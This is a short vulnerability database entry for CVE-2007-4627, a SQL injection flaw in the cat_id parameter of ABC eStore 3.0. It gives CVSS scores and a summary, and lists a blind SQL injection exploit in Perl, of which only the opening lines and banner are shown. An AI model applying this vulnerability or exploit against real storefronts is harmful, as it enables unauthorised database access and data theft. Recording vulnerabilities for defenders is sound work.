7.5
CVSSv2

CVE-2007-4627

Published: 31/08/2007 Updated: 29/09/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

SQL injection vulnerability in index.php in ABC eStore 3.0 allows remote malicious users to execute arbitrary SQL commands via the cat_id parameter.

Vulnerable Product Search on Vulmon Subscribe to Product

algera abc estore 3.0

Exploits

#!/usr/bin/perl use LWP::UserAgent; use Getopt::Long; if(!$ARGV[1]) { print "\n |-------------------------------------------------|"; print "\n | newhack[dot]org |"; print "\n |-------------------------------------------------|"; print "\n | ABC estore 30 (cat_id) Blind SQL Injection |"; print "\n | ...